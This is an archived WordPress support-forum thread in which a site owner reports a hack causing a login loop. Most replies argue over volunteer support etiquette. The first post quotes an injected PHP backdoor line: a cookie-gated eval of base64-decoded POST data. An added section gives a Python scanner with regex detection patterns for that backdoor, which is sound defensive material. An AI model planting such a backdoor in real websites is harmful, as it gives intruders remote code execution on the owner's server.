Login Hacked - Security Issue 2.6 (21 posts)

  1. viewsoj
    Member
    Posted 5 years ago #

    Our blog has been hacked and we are unable to log in. When you try to log in you get looped back to the login page with no explanation/error message. The blog is up and running and I can't see any issues (yet..).
    There were 2 files that were changed, index.php and xmlrpc.php, and I found this line added to the index file:
    <?php if(md5($_COOKIE['f711587cbed7bdca'])=="1452a323f11b0dd60c49b49f004f077c"){ eval(base64_decode($_POST['file'])); exit; } ?>

    Looking for help...
    Thank you.
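
A defender's check for the line quoted in the post above, added here as an example and not part of the original thread: it walks a WordPress tree and flags PHP lines where request data reaches `eval()` or where a cookie is hashed and compared to a fixed digest. The rule names, function names and regexes are assumptions chosen for this illustration, and the patterns are heuristics matched to the shape of that one line.

```python
import re
import sys
from pathlib import Path

# Request-controlled data reaching eval(), optionally through decoder calls.
# Heuristic: modelled on the shape of the line quoted in the post.
EVAL_OF_REQUEST = re.compile(
    r"\beval\s*\(\s*(?:(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(\s*)*"
    r"\$_(?:POST|GET|COOKIE|REQUEST)\b",
    re.IGNORECASE,
)
# A cookie value hashed and compared to a hard-coded digest (the access gate).
COOKIE_HASH_GATE = re.compile(
    r"\b(?:md5|sha1)\s*\(\s*\$_COOKIE\s*\[[^\]]+\]\s*\)\s*={2,3}\s*[\"'][0-9a-f]{32,40}[\"']",
    re.IGNORECASE,
)
RULES = {"eval-of-request-data": EVAL_OF_REQUEST, "cookie-hash-gate": COOKIE_HASH_GATE}

def scan_text(text):
    """Return a sorted list of (line_number, rule_name) hits for one PHP source."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((lineno, name))
    return sorted(hits)

def scan_tree(root):
    """Scan every *.php file under root; return {relative_path: hits} for flagged files."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.php")):
        # errors="replace" so odd encodings in injected code cannot abort the scan
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed sample: the line quoted in the post, placed on line 2 of a stub file.
SAMPLE_INFECTED = (
    "<?php /* stub front controller */ ?>\n"
    "<?php if(md5($_COOKIE['f711587cbed7bdca'])==\"1452a323f11b0dd60c49b49f004f077c\")"
    "{ eval(base64_decode($_POST['file'])); exit; } ?>\n"
)
# Constructed benign sample: decoding and hashing that never touches request data.
SAMPLE_CLEAN = "<?php\n$title = base64_decode($stored);\necho md5($title);\n"

if __name__ == "__main__":
    for rel, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(rel, hits)
```

Run it with the site's document root as the only argument. A hit in a file that ships with WordPress, such as index.php or xmlrpc.php, is a reason to compare that file against a clean copy of the same release.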

  2. rfearns
    Member
    Posted 5 years ago #

    Experienced same problem after upgrading. Clearing my cookies allowed me back into my admin area.

  3. viewsoj
    Member
    Posted 5 years ago #

    I tried to log in after clearing the cookies on both IE and Firefox. Nothing. It also doesn't explain the changed files and the extra line of code we found in the index.php file.

  4. viewsoj
    Member
    Posted 5 years ago #

    Tried to reset the login as well and nothing happened. Can't access the blog. Anyone have any ideas out there?

  5. teedubyaw
    Member
    Posted 5 years ago #

    Same thing happened to my site, CultivateGreatness.com

    It is a login loop. I noticed on my FTP that each file had been downloaded and reuploaded... all dates are Sept 5 2007.

    Very bizarre.

    Whoever is doing this isn't very thoughtful of others, and needs to find a more productive hobby or find more malicious targets.

  6. iridiax
    Member
    Posted 5 years ago #

    Are you using 2.6.2 and did you set your three custom secret keys (cookie security measures) in wp-config.php?

  7. teedubyaw
    Member
    Posted 5 years ago #

    I was using 2.6 and haven't been able to do anything to the site since.

    I did do the upgrade to 2.6.2 but am still not able to log in.

  8. teedubyaw
    Member
    Posted 5 years ago #

    Does WordPress even look at the support area?

    I'm amazed at how little support this has received. Maybe it's time to move my 15 blogs to a new platform, one with support?

  9. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    Just because you were hacked does not necessarily mean it's a WordPress problem. There's a lot of ways they could get in to your site, and most of them do not involve WordPress.

    Especially if your main index.php was changed, it's highly unlikely that they got in via WP to do that.

  10. teedubyaw
    Member
    Posted 5 years ago #

    Well, it appears to be a non-isolated incident.

    Many people are having this same problem. Please think outside the box, and don't write off our support issues so quickly.

  11. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    don't write off our support issues so quickly.

    When you actually POST a real support issue that we're capable of helping you with, then rest assured, we will do our best.

    However, you have not yet posted one single thing that merits any sort of response at all. You've asked no questions, you've posted no details, you have not even said what the results of the hack were, or talked about looking at the server logs to find the entry point. You've done nothing at all except complain. Inaccurately too.

    If you have a problem, then post a new thread describing the problem. Then, maybe, somebody will be kind enough to help you with this free product which you did not pay anybody anything for. Nobody here owes you anything just because you use their software.

    If you need support immediately, then I suggest you go find somebody to hire who can provide that support. Here, however, volunteers provide support for free. And you get what you pay for, bud.

    As for your 15 blogs, if you're unable to maintain or operate them without support, then yes, perhaps you should move to another platform.

  12. omgitztrey
    Member
    Posted 5 years ago #

    The only bad thing about WordPress is the attitude issue people have on this forum.

  13. teedubyaw
    Member
    Posted 5 years ago #

    yeah, after 3 days of ZERO support... not even a message... then yeah, I'm gonna have a bit of attitude.

    At least a moderator answered this thread finally.

    Obviously, I'm not the only one to have this problem, so it may be a larger issue than you are giving credit.

  14. Samuel Wood (Otto)
    Tech Ninja
    Posted 5 years ago #

    What support do you want or expect? You posted nothing worth responding to. You've posted zero information. There is nothing of any value in this thread.

    I mean, honestly, WTF are you expecting us to say? "You got hacked? Bummer." This ain't no place for sympathy. There's nothing we can say to this thread because this thread has no answerable questions in it. It has a total lack of any useful information.

    If you get hacked, then I'm sorry, but that's YOUR problem. It's your website, so eventually it's always your problem. There are no currently known vulnerabilities in WordPress, so they probably didn't hack you through that door.

    And as far as the WordPress forum is concerned, that fact ends the discussion. We can't help you when there's nothing to help you with.

  15. vietknight
    Member
    Posted 5 years ago #

    yeah, after 3 days of ZERO support... not even a message... then yeah, I'm gonna have a bit of attitude.

    Did you NOT read what Otto just posted? This is a FREE PRODUCT, no one here HAS TO HELP YOU. You're not the only one with unanswered posts. Don't go justifying your attitude by saying you've received zero support.

  16. syncbox
    Member
    Posted 5 years ago #

    Especially since no support is implied anywhere.

    I've found that if you ask nicely, most of the time, someone helps out. There are some really great developers who DO listen and help here.

    On the other hand, I've certainly asked questions that get no answers at all. C'est la vie...

    Most of THOSE times, it's because I am trying to do something VERY funky!

    The wp-pro list has affordable professional help that I've hired before and had great results from... but expect to pay a reasonable amount for their time; it's worth it in every case I've experienced.

    Good luck with it!

  17. crustymusic99
    Member
    Posted 5 years ago #

    mean, honestly, WTF are you expecting us to say?

    Gee I don't know, not this? Considering it is a support forum something helpful would be nice.. I generally expect a mod to represent their team well, and you're doing nothing to help come to a solution.

    Ever think of telling someone what information to provide to help solve the problem if they have not?

    You've done nothing at all except complain.

    No, bud, re-read his posts. He asked for help to a problem. Complaining would be what I'm doing to you. You work in customer service, that is part of "support". And telling someone to go find another platform is 100% opposite of what you need to be doing.

  18. syncbox
    Member
    Posted 5 years ago #

    but that is the point -- HE DOESN'T WORK IN CUSTOMER SUPPORT.

    there IS no customer support here.

  19. vietknight
    Member
    Posted 5 years ago #

    You work in customer service, that is part of "support".

    Definition of "customer": someone who pays for goods or services
    wordnet.princeton.edu/perl/webwn

    Otto is voluntarily offering his support to this forum. The support you are making reference to is to someone who's actually PAID for their product. There's a big difference between "work" and "volunteer". You should be grateful that Otto's even replying to these issues.

    Someone who DEMANDS support when they have done nothing to earn it is just plain incoherent.

    Read the GPL please:

    BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

  20. whooami
    Member
    Posted 5 years ago #

    I'll join the pile-on, before this is locked.

    Ever think of telling someone what information to provide to help solve the problem if they have not?

    It's nice to think that one can be prodded to answer questions. That's not the way it goes in the real world though, and especially not on the web.

    Why not?

    Because there are people that know what info to provide, and if they don't, they at least try. Those people, far and away, get more 'attention' because they tend to be easier to help.

    Consider that as volunteers, we get to pick and choose what we respond to. Why am I, or anyone else, going to pull teeth in one thread, when we can help 10 others in the same amount of time??

    And, well, to be honest, it's not our job to pry answers out of anyone. In the case of the person above with 15 blogs, someone like myself would be inclined to think that he/she ought to already know what info to provide. And, if not, then perhaps he/she ought to get a new hobby/job.

  21. iridiax
    Member
    Posted 5 years ago #

    A good first step before asking for help here is a forum search for keywords describing your problem or for unique words in your code or error message. Of course, it takes a little effort to wade through the threads, but then you don't have to wait around hoping that someone will answer.

Topic Closed

This topic has been closed to new replies.
